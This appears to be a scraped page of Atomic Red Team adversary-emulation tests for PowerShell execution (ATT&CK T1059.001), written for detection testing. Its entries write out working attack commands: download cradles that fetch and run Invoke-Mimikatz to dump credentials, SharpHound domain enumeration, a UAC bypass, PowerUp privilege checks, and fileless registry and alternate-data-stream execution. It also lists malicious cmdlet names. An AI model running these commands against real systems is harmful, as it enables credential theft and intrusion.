Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include theStart-Processcmdlet which can be used to run an executable and theInvoke-Commandcmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
A number of PowerShell-based offensive testing tools are available, including Empire, PowerSploit, PoshC2, and PSAttack.(Citation: Github PSAttack)
PowerShell commands/scripts can also be executed without directly invoking the
powershell.exebinary through interfaces to PowerShell's underlyingSystem.Management.Automationassembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)
-
Atomic Test #3 - Run Bloodhound from Memory using Download Cradle
-
Atomic Test #13 - ATHPowerShellCommandLineParameter -Command parameter variations
-
Atomic Test #15 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations
Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed.
Supported Platforms: Windows
auto_generated_guid: f3132740-55bc-48c4-bcc0-758a459cd027
| Name | Description | Type | Default Value |
|---|---|---|---|
| mimurl | Mimikatz url | url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1 |
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur.
Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file.
Supported Platforms: Windows
auto_generated_guid: a21bb23e-e677-4ee7-af90-6931b57b6350
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5Remove-Item $env:Temp\*BloodHound.zip -ForceDescription: SharpHound.ps1 must be located at "PathToAtomicsFolder..\ExternalPayloads\SharpHound.ps1"
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1") {exit 0} else {exit 1}New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run and then compress and store the data to the temp directory. If system is unable to contact a domain, proper execution will not occur.
Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file.
Supported Platforms: Windows
auto_generated_guid: bf8c1441-4674-4dab-8e4e-39d93d08f9b7
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5Remove-Item $env:Temp\*BloodHound.zip -ForceRun mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed.
Supported Platforms: Windows
auto_generated_guid: af1800cf-9f9d-4fd1-a709-14b1e6de020d
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcrNote: Windows 10 only. Upon execution windows backup and restore window will be opened.
Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
Supported Platforms: Windows
auto_generated_guid: 06a220b6-7e29-4bd8-9d07-5b4d86742372
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed.
Provided by https://github.com/mgreen27/mgreen27.github.io
Supported Platforms: Windows
auto_generated_guid: 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da
| Name | Description | Type | Default Value |
|---|---|---|---|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1 |
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"Powershell xml download request. Upon execution, "Download Cradle test success!" will be dispalyed.
Provided by https://github.com/mgreen27/mgreen27.github.io
Supported Platforms: Windows
auto_generated_guid: 4396927f-e503-427b-b023-31049b9b09a6
| Name | Description | Type | Default Value |
|---|---|---|---|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml |
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!".
Provided by https://github.com/mgreen27/mgreen27.github.io
Supported Platforms: Windows
auto_generated_guid: 8a2ad40b-12c7-4b25-8521-2737b0a415af
| Name | Description | Type | Default Value |
|---|---|---|---|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct |
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"Provided by https://github.com/mgreen27/mgreen27.github.io Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
Supported Platforms: Windows
auto_generated_guid: cc50fa2a-a4be-42af-a88f-e347ba0bf4d7
- Open Powershell_ise as a Privileged Account
- Invoke-DownloadCradle.ps1
Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open "C:\Windows\Temp" and verify that art-marker.txt is in the folder.
Supported Platforms: Windows
auto_generated_guid: fa050f5e-bc75-4230-af73-b6fd7852cd73
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))Remove-Item -path C:\Windows\Temp\art-marker.txt -Force -ErrorAction Ignore
Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction IgnoreCreates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed.
Supported Platforms: Windows
auto_generated_guid: 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680
| Name | Description | Type | Default Value |
|---|---|---|---|
| ads_file | File created to store Alternate Stream Data | string | $env:TEMP\NTFS_ADS.txt |
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommandRemove-Item #{ads_file} -Force -ErrorAction Ignoreif((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1}Write-Host Prereq's for this test cannot be met automaticallyConnect to a remote powershell session and interact with the host. Upon execution, network test info and 'T1086 PowerShell Session Creation and Use' will be displayed.
Supported Platforms: Windows
auto_generated_guid: 7c1acec2-78fa-4305-a3e0-db2a54cddecd
| Name | Description | Type | Default Value |
|---|---|---|---|
| hostname_to_connect | The host to connect to, by default it will connect to the local machine | string | $env:COMPUTERNAME |
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_UseTry {
New-PSSession -ComputerName #{hostname_to_connect} -ErrorAction Stop | Out-Null
exit 0
}
Catch {
exit 1
}Enable-PSRemotingExecutes powershell.exe with variations of the -Command parameter
Supported Platforms: Windows
auto_generated_guid: 686a9785-f99b-41d4-90df-66ed515f81d7
| Name | Description | Type | Default Value |
|---|---|---|---|
| command_line_switch_type | The type of supported command-line switch to use | string | Hyphen |
| command_param_variation | The "Command" parameter variation to use | string | C |
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction StopDescription: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -ForceAtomic Test #14 - ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments
Executes powershell.exe with variations of the -Command parameter with encoded arguments supplied
Supported Platforms: Windows
auto_generated_guid: 1c0a870f-dc74-49cf-9afc-eccc45e58790
| Name | Description | Type | Default Value |
|---|---|---|---|
| command_line_switch_type | The type of supported command-line switch to use | string | Hyphen |
| command_param_variation | The "Command" parameter variation to use | string | C |
| encoded_arguments_param_variation | The "EncodedArguments" parameter variation to use | string | EA |
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction StopDescription: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -ForceExecutes powershell.exe with variations of the -EncodedCommand parameter
Supported Platforms: Windows
auto_generated_guid: 86a43bad-12e3-4e85-b97c-4d5cf25b95c3
| Name | Description | Type | Default Value |
|---|---|---|---|
| command_line_switch_type | The type of supported command-line switch to use | string | Hyphen |
| encoded_command_param_variation | The "EncodedCommand" parameter variation to use | string | E |
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction StopDescription: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -ForceAtomic Test #16 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments
Executes powershell.exe with variations of the -EncodedCommand parameter with encoded arguments supplied
Supported Platforms: Windows
auto_generated_guid: 0d181431-ddf3-4826-8055-2dbf63ae848b
| Name | Description | Type | Default Value |
|---|---|---|---|
| encoded_command_param_variation | The "EncodedCommand" parameter variation to use | string | E |
| command_line_switch_type | The type of supported command-line switch to use | string | Hyphen |
| encoded_arguments_param_variation | The "EncodedArguments" parameter variation to use | string | EncodedArguments |
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction StopDescription: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -ForceUse of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
Supported Platforms: Windows
auto_generated_guid: a538de64-1c74-46ed-aa60-b995ed302598
| Name | Description | Type | Default Value |
|---|---|---|---|
| obfuscated_code | Defaults to: Invoke-Expression with a "Write-Host" line. | string | JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA== |
powershell.exe -e #{obfuscated_code}Powershell execution of known Malicious PowerShell Cmdlets
Supported Platforms: Windows
auto_generated_guid: 49eb9404-5e0f-4031-a179-b40f7be385e3
| Name | Description | Type | Default Value |
|---|---|---|---|
| Malicious_cmdlets | Known Malicious Cmdlets | string | "Add-Persistence", "Find-AVSignature", "Get-GPPAutologon", "Get-GPPPassword", "Get-HttpStatus", "Get-Keystrokes", "Get-SecurityPackages", "Get-TimedScreenshot", "Get-VaultCredential", "Get-VolumeShadowCopy", "Install-SSP", "Invoke-CredentialInjection", "Invoke-DllInjection", "Invoke-Mimikatz", "Invoke-NinjaCopy", "Invoke-Portscan", "Invoke-ReflectivePEInjection", "Invoke-ReverseDnsLookup", "Invoke-Shellcode", "Invoke-TokenManipulation", "Invoke-WmiCommand", "Mount-VolumeShadowCopy", "New-ElevatedPersistenceOption", "New-UserPersistenceOption", "New-VolumeShadowCopy", "Out-CompressedDll", "Out-EncodedCommand", "Out-EncryptedScript", "Out-Minidump", "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord" |
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}Check for privilege escalation paths using PowerUp from PowerShellMafia
Supported Platforms: Windows
auto_generated_guid: 1289f78d-22d2-4590-ac76-166737e1811b
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecksRed teamer's avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with a payload to compromise hosts. reference
Supported Platforms: Windows
auto_generated_guid: 999bff6d-dc15-44c9-9f5c-e1051bfc86e1
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]Dump BloodHound data using SOAPHound. Upon execution, BloodHound data will be dumped and stored in the specified output directory. src: https://github.com/FalconForceTeam/SOAPHound
Supported Platforms: Windows
auto_generated_guid: 6a5b2a50-d037-4879-bf01-43d4d6cbf73f
| Name | Description | Type | Default Value |
|---|---|---|---|
| user | Username for authentication | string | $env:USERNAME |
| password | Password for authentication | string | P@ssword1 |
| domain | Domain for authentication | string | $env:USERDOMAIN |
| dc | Domain Controller IP | string | 10.0.1.14 |
| cachefilename | Cache filename | string | c:\temp\cache.txt |
| outputdirectory | Output directory | string | c:\temp\test2 |
| soaphound_path | Path to SOAPHound binary | string | PathToAtomicsFolder\T1059.001\bin\SOAPHound.exe |
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}Build cache using SOAPHound. Upon execution, a cache will be built and stored in the specified cache filename. src: https://github.com/FalconForceTeam/SOAPHound
Supported Platforms: Windows
auto_generated_guid: 4099086c-1470-4223-8085-8186e1ed5948
| Name | Description | Type | Default Value |
|---|---|---|---|
| user | Username for authentication | string | $env:USERNAME |
| password | Password for authentication | string | P@ssword1 |
| domain | Domain for authentication | string | $env:USERDOMAIN |
| dc | Domain Controller IP | string | 10.0.1.14 |
| cachefilename | Cache filename | string | c:\temp\cache.txt |
| soaphound_path | Path to SOAPHound binary | string | PathToAtomicsFolder\T1059.001\bin\SOAPHound.exe |
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}